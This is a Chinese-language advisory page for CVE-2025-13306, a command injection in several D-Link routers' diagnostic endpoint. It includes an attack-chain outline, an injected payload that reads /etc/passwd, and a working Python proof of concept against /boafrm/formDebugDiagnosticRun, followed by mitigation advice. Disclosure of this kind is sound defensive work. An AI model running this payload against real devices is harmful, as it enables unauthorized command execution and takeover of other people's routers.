CVE-2025-13306 CVSS 6.3 中危

CVE-2025-13306 D-Link路由器formDebugDiagnosticRun命令注入漏洞

披露日期: 2025-11-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13306

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DWR-M920, DWR-M921, DIR-822K, DIR-825M

漏洞概述

CVE-2025-13306是D-Link多款路由器产品中发现的安全漏洞，存在于固件版本1.1.5中。该漏洞位于/boafrm/formDebugDiagnosticRun功能的host参数处理环节，攻击者可通过构造恶意请求注入操作系统命令。由于该漏洞可远程利用且仅需低权限认证，对使用受影响设备的用户构成中等程度的安全风险。攻击者可以利用此漏洞在设备上执行任意命令，从而获取设备的完全控制权、窃取网络流量或将其纳入僵尸网络。目前该漏洞的利用代码已公开披露。

技术细节

该漏洞为典型的命令注入（Command Injection）问题。漏洞位于D-Link路由器Web管理界面的formDebugDiagnosticRun处理函数中，当处理host参数时未对用户输入进行充分的过滤和验证。攻击者可在host参数中插入分号、管道符等Shell命令分隔符，实现命令拼接执行。例如，通过在host参数中注入类似`;cat /etc/passwd`的Payload，可让设备执行诊断命令的同时执行任意系统命令。由于该功能本身设计用于网络诊断，攻击者无需特殊权限即可触发漏洞，但需具备网络访问能力或已获取低权限账户。成功利用后可获得root权限的远程代码执行能力。

攻击链分析

STEP 1

Reconnaissance

扫描目标网络，发现运行受影响固件版本的D-Link路由器

STEP 2

Access

获取设备Web管理界面访问权限（低权限账户或无需认证）

STEP 3

Exploit

构造恶意请求，向/boafrm/formDebugDiagnosticRun端点发送包含命令注入Payload的host参数

STEP 4

Execute

成功注入命令后在设备上以root权限执行任意系统命令

STEP 5

Persist

通过写入后门或修改启动脚本建立持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13306 PoC - D-Link Command Injection
# Target: D-Link DWR-M920, DWR-M921, DIR-822K, DIR-825M (Firmware 1.1.5)
# Endpoint: /boafrm/formDebugDiagnosticRun
# Parameter: host

target = "http://target-ip/"
payload = ";cat /etc/passwd > /www/poc.txt;"

data = {
    "host": payload,
    "pingCount": "4",
    "maxRespTime": "",
    "action": "diagRun"
}

try:
    response = requests.post(target + "boafrm/formDebugDiagnosticRun", data=data, timeout=10)
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text[:500]}")
except Exception as e:
    print(f"Error: {e}")

影响范围

D-Link DWR-M920 固件 1.1.5

D-Link DWR-M921 固件 1.1.5

D-Link DIR-822K 固件 1.1.5

D-Link DIR-825M 固件 1.1.5

防御指南

临时缓解措施

在厂商发布修复固件前，建议将路由器Web管理界面的远程访问权限关闭，仅允许通过本地局域网访问。同时启用管理员强密码策略，避免使用默认凭据。如需远程管理，应使用VPN等安全通道连接到内网后再访问路由器管理界面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13306
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13306
3 Details https://www.cvedetails.com/cve/CVE-2025-13306/
4 VulDB https://vuldb.com/cve/CVE-2025-13306
5 Link https://github.com/LX-LX88/cve/issues/15
6 Link https://vuldb.com/?ctiid.332646
7 Link https://vuldb.com/?id.332646
8 Link https://vuldb.com/?submit.691813
9 Link https://vuldb.com/?submit.693805
10 Link https://vuldb.com/?submit.693807
11 Link https://vuldb.com/?submit.695426
12 Link https://www.dlink.com/
13 Link https://github.com/LX-LX88/cve/issues/15

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表